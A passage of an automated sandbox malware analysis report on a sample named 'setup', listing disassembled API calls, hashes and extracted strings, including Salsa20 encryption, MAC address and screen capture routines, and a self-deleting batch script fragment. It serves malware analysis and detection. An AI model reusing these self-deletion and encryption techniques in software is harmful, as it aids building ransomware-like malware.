                • _memset.LIBCMT ref: 0041110B
                • _sprintf.LIBCMT ref: 0041112E
                • lstrcatA.KERNEL32(?,?), ref: 0041113C
                • CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                • String ID: %.2X
                • API String ID: 2451520719-213608013
                • Opcode ID: 3f68754a9cad00adfa5318296b42566dd369576488fe948bfb568d47563decbb
                • Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
                • Opcode Fuzzy Hash: 3f68754a9cad00adfa5318296b42566dd369576488fe948bfb568d47563decbb
                • Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9
                APIs
                • GetLastError.KERNEL32 ref: 00411915
                • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
                • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
                • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
                • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
                • lstrcpyW.KERNEL32(00000000,?), ref: 00411962
                • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
                • lstrcatW.KERNEL32(00000000,?), ref: 0041198B
                • lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
                • lstrcatW.KERNEL32(00000000,?), ref: 00411999
                • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
                • _memset.LIBCMT ref: 004119B8
                • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC
                  • Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9
                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
                • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                • String ID: failed with error
                • API String ID: 4182478520-946485432
                • Opcode ID: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                • Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
                • Opcode Fuzzy Hash: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                • Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED
                APIs
                  • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
                  • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
                  • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
                • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 0040F900
                • _memmove.LIBCMT ref: 0040F9EA
                • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
                • _memmove.LIBCMT ref: 0040FADA
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                • String ID:
                • API String ID: 273148273-0
                • Opcode ID: fcdb3c65d237faf0aacdec3d6eb45a8278326906d3b88b2002ac43bdb553a6d9
                • Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
                • Opcode Fuzzy Hash: fcdb3c65d237faf0aacdec3d6eb45a8278326906d3b88b2002ac43bdb553a6d9
                • Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99
                APIs
                • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
                • __CxxThrowException@8.LIBCMT ref: 0040E8E4
                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
                • __CxxThrowException@8.LIBCMT ref: 0040E90F
                • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
                • __CxxThrowException@8.LIBCMT ref: 0040E93E
                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
                • __CxxThrowException@8.LIBCMT ref: 0040E96F
                • _memset.LIBCMT ref: 0040E98E
                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
                • __CxxThrowException@8.LIBCMT ref: 0040E9B4
                • _sprintf.LIBCMT ref: 0040E9D3
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                • String ID: %.2X
                • API String ID: 1084002244-213608013
                • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                • Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
                • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                • Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9
                APIs
                • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000), ref: 0040EB01
                • __CxxThrowException@8.LIBCMT ref: 0040EB17
                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
                • __CxxThrowException@8.LIBCMT ref: 0040EB42
                • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0040EB4E
                • __CxxThrowException@8.LIBCMT ref: 0040EB64
                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0040EB83
                • __CxxThrowException@8.LIBCMT ref: 0040EB95
                • _memset.LIBCMT ref: 0040EBB4
                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
                • __CxxThrowException@8.LIBCMT ref: 0040EBDA
                • _sprintf.LIBCMT ref: 0040EBF4
                • CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                • String ID: %.2X
                • API String ID: 1637485200-213608013
                • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                • Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
                • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                • Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8
                APIs
                  • Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                  • Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                  • Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
                  • Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                  • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                  • Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                  • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                  • Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A
                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
                • CreateCompatibleDC.GDI32(00000000), ref: 00482323
                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
                • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
                • SelectObject.GDI32(00000000,00000000), ref: 0048235C
                • GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
                • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
                • GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
                • SelectObject.GDI32(?,?), ref: 00482436
                • DeleteObject.GDI32(00000000), ref: 0048243D
                • DeleteDC.GDI32(?), ref: 0048244A
                • DeleteDC.GDI32(?), ref: 00482450
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                • String ID: .\crypto\rand\rand_win.c$DISPLAY
                • API String ID: 151064509-1805842116
                • Opcode ID: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
                • Instruction ID: 00d76d2b57e2ae43ffa0e146b327d2d4306243c0a97269805a4caa25bb15a565
                • Opcode Fuzzy Hash: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
                • Instruction Fuzzy Hash: 0441BB71944300EBD3105BB6DC86F6FBBF8FF85B14F00052EFA54962A1E77598008B6A
                APIs
                • _malloc.LIBCMT ref: 0040E67F
                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00740000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                • _malloc.LIBCMT ref: 0040E68B
                • _wprintf.LIBCMT ref: 0040E69E
                • _free.LIBCMT ref: 0040E6A4
                  • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                  • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
                • _free.LIBCMT ref: 0040E6C5
                • _malloc.LIBCMT ref: 0040E6CD
                • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
                • _sprintf.LIBCMT ref: 0040E720
                • _wprintf.LIBCMT ref: 0040E732
                • _wprintf.LIBCMT ref: 0040E73C
                • _free.LIBCMT ref: 0040E745
                Strings
                • Address: %s, mac: %s, xrefs: 0040E72D
                • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
                • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                • API String ID: 3901070236-1604013687
                • Opcode ID: 7f15536ece751806a483f3f034c79f9e821e57de7f78c7461c513ac46dc48599
                • Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
                • Opcode Fuzzy Hash: 7f15536ece751806a483f3f034c79f9e821e57de7f78c7461c513ac46dc48599
                • Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9
                APIs
                  • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
                  • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
                  • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
                • PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00410346
                • _memmove.LIBCMT ref: 00410427
                • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0041048E
                • _memmove.LIBCMT ref: 00410514
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                • String ID:
                • API String ID: 273148273-0
                • Opcode ID: 2c535a9ce1b4a658066c3b574bdbe8b0733bbf1e4505cf72e2a34136cfdfc2a6
                • Instruction ID: 4d52a43d2e6eeb98f1fe08e229a92f838bd03635929547cf71b8ba18611ce854
                • Opcode Fuzzy Hash: 2c535a9ce1b4a658066c3b574bdbe8b0733bbf1e4505cf72e2a34136cfdfc2a6
                • Instruction Fuzzy Hash: EF429F70D00208DBDF14DFA4C985BDEB7F5BF04308F20456EE415A7291E7B9AA85CBA9
                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                • String ID:
                • API String ID: 3232302685-0
                • Opcode ID: 343a40c2320f36c0a67bd0d09e6816cdff555a949c20798249c71fe74911a55b
                • Instruction ID: e959444c36dd18fc08dff6604914d564c76187b82df2896015b22d61e5b1ffa1
                • Opcode Fuzzy Hash: 343a40c2320f36c0a67bd0d09e6816cdff555a949c20798249c71fe74911a55b
                • Instruction Fuzzy Hash: 09B19F70D00208DBDF20DFA4D945BDEB7B5BF15308F50407AE40AAB291E7799A89CF5A
                APIs
                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: InfoLocale
                • String ID: ACP$OCP
                • API String ID: 2299586839-711371036
                • Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                • Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
                • Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                • Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C
                APIs
                Strings
                • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
                • input != nullptr && output != nullptr, xrefs: 0040C095
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __wassert
                • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                • API String ID: 3993402318-1975116136
                • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                • Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
                • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                • Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54
                APIs
                • CryptDestroyHash.ADVAPI32(?), ref: 00411190
                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 004111A0
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Crypt$ContextDestroyHashRelease
                • String ID:
                • API String ID: 3989222877-0
                • Opcode ID: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
                • Instruction ID: be51c898aa0ddf1eb2c7ddf255022cb250d4a78141f94ceb906d675081cd9b05
                • Opcode Fuzzy Hash: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
                • Instruction Fuzzy Hash: F0E0EC74F40305A7EF50DBB6AC49FABB6A86B08745F444526FB04F3251D62CD841C528
                APIs
                • CryptDestroyHash.ADVAPI32(?), ref: 0040EA69
                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EA79
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Crypt$ContextDestroyHashRelease
                • String ID:
                • API String ID: 3989222877-0
                • Opcode ID: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
                • Instruction ID: d41dd3a2d1aa4a110fdd7d588524fe859ae41a35967fa473e5fd9fc866ad400b
                • Opcode Fuzzy Hash: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
                • Instruction Fuzzy Hash: B2E0EC78F002059BDF50DBB79C89F6B72A87B08744B440835F804F3285D63CD9118928
                APIs
                • CryptDestroyHash.ADVAPI32(?), ref: 0040EC80
                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EC90
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Crypt$ContextDestroyHashRelease
                • String ID:
                • API String ID: 3989222877-0
                • Opcode ID: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
                • Instruction ID: 275dd0b1ae59d7aa5d1c23d1b64c6eee76a350be21334d4cde6f8a02617c5264
                • Opcode Fuzzy Hash: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
                • Instruction Fuzzy Hash: 97E0BDB4F0420597EF60DEB69E49F6B76A8AB04645B440835E904F2281DA3DD8218A29
                APIs
                • GetProcessHeap.KERNEL32(00423FED,00507990,00000014), ref: 004278D5
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: HeapProcess
                • String ID:
                • API String ID: 54951025-0
                • Opcode ID: 993d631f5fa9c6d26d39642974962185f27c3e068b68c4f08d438ea8c169c0b8
                • Instruction ID: c175dc67e46cb5b18e7b8d473ad54adbb7c8ff58e9170129aa5670ed77b5f39c
                • Opcode Fuzzy Hash: 993d631f5fa9c6d26d39642974962185f27c3e068b68c4f08d438ea8c169c0b8
                • Instruction Fuzzy Hash: 79B012F0705102474B480B387C9804935D47708305300407DF00BC11A0EF70C860BA08
                APIs
                • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                • GetLastError.KERNEL32 ref: 00412509
                • CloseHandle.KERNEL32 ref: 0041251C
                • CloseHandle.KERNEL32 ref: 00412539
                • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
                • GetLastError.KERNEL32 ref: 0041255B
                • CloseHandle.KERNEL32 ref: 0041256E
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandle$CreateErrorLastMutex
                • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                • API String ID: 2372642624-488272950
                • Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                • Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
                • Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                • Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64
                APIs
                • DecodePointer.KERNEL32 ref: 00427B29
                • _free.LIBCMT ref: 00427B42
                  • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                  • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                • _free.LIBCMT ref: 00427B55
                • _free.LIBCMT ref: 00427B73
                • _free.LIBCMT ref: 00427B85
                • _free.LIBCMT ref: 00427B96
                • _free.LIBCMT ref: 00427BA1
                • _free.LIBCMT ref: 00427BC5
                • EncodePointer.KERNEL32(0076CEC8), ref: 00427BCC
                • _free.LIBCMT ref: 00427BE1
                • _free.LIBCMT ref: 00427BF7
                • _free.LIBCMT ref: 00427C1F
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                • String ID: pv
                • API String ID: 3064303923-2548300653
                • Opcode ID: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
                • Instruction ID: d8036121d910c09816430481b6b6363fcbb95216f7cc64832fdbf6810ac9f003
                • Opcode Fuzzy Hash: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
                • Instruction Fuzzy Hash: C2217535A042748BCB215F56BC80D4A7BA4EB14328B94453FEA14573A1CBF87889DA98
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _strncmp
                • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                • API String ID: 909875538-2733969777
                • Opcode ID: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                • Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
                • Opcode Fuzzy Hash: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                • Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B
                APIs
                Memory Dump Source
